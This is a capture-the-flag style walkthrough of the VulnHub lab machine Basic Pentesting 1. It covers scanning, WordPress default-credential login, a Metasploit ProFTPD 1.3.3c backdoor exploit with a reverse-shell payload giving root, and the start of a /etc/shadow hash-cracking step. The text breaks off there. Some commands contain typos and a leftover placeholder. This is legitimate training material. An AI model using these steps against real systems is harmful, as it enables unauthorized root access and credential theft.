Basic Pentesting 1 VulnHub Walkthrough

Introduction

aminoacid

~5 min read · February 3, 2026 (Updated: February 3, 2026) · Free: Yes

Introduction

This write-up covers the exploitation of the Basic Pentesting: 1 machine from VulnHub. The goal was to assess how easily the system could be compromised using common penetration testing techniques. Result: Full system compromise was achieved through an exposed WordPress installation with weak credentials and an outdated ProFTPD service containing a known backdoor.

Link to the VulnHub machine: https://drive.google.com/file/d/1wkfI9cpyjouj6ox_88EqF6tKMtTHIYC1/view?usp=sharing

Vulnerability 1: Improper Virtual Host Configuration & Weak WordPress Credentials

Description: The web server exposes a hidden WordPress installation due to a misconfigured virtual host, and the WordPress admin account uses default weak credentials (admin:admin), allowing attackers to gain full administrative access.

Exploitation POC:

Step 1. Identify the web server

- Run an ARP scan to find the target machine's IP

sudo arp-scan

Scan the IP using nmap

nmap -sC -SV -Pn 192.168.64.2

Visit http://192.168.64.2 — Apache default page "It works!" appears

Step 2. Discover the Hidden WordPress Directory

Perform directory enumeration using gobuster

gobuster dir -u http://192.168.64.2/ -w /usr/share/wordlists/dirbuster/di
rectory-list-2.3-medium.txt

Gobuster reveals the path (/secret); a broken Wordpress

interface loads when visited

Step 3. Identify Virtual Host Misconfiguration and fixing the mapping

Inspect the page and links, they point to: http://vtcsec/secret
The domain vtcsec does not resolve, causing the UI to break.

Add the domain manually to /etc/hosts

Full WordPress UI loads correctly when refreshed.

Step 4. Enumerate WordPress Users

Run WPScan to enumerate users

wpscan -url http://192.168.64.2/secret/ --enumerate u

INSERT WPSCAN 2
WPScan identifies username: admin

Step 5. Exploit Weak Credentials

Go to the Wordpress login page
Attempt default credentials (admin:admin)

Vulnerability 2: ProFTPD 1.3.3c Backdoor Remote Command Execution

Description: The FTP service is running ProFTPD 1.3.3c, a version containing a known backdoor that allows unauthenticated remote command execution as the root user.

Exploitation POC:

Step 1. Identify the Vulnerable FTP Service

The nmap scan results shows an ftp service ProFTPD 1.3.3c — This version is publicly known to contain a backdoor inserted in its source code.

Step 2. Search for Public Exploits

Check available exploits using Searchsploit

searchsploit proftpo 1.3.3c

Results show an exploit for ProFTPD 1.3.3c Backdoor Command Execution, including a Metasploit module.

Step 3. Load the Exploit in Metasploit

Start Metasploit (msfconsole)

Load the exploit module

use exploit/unix/ftp/proftpd_133c_backdoor

Set the target IP

set RHOST 192.168.64.2

Choose payloads

show payloads
set PAYLOAD cmd/unix/reverse

Setup options and exploit

set LHOST 192.168.64.4

Exploit awayyy!

Step 4. Gain Root Command Shell

Metasploit returns:

Command shell session opened

This shell provides direct command execution as root.

Step 5. Verify root privileges

Run the following to check the user and id:

whoami       // returns root
check id.    // output: uid=0(root)

Vulnerability 3: Weak Password Policy allowing privileged account compromise

Description: The system stores user password hashes in /etc/shadow, and once an attacker gains initial root-level access, the hash for user marlinspike can be extracted and cracked using John the Ripper. The cracked password allows the attacker to log in via SSH, gaining persistent authenticated access.

Exploitation POC:

Step 1. Start with Root Access from Vulnerability 2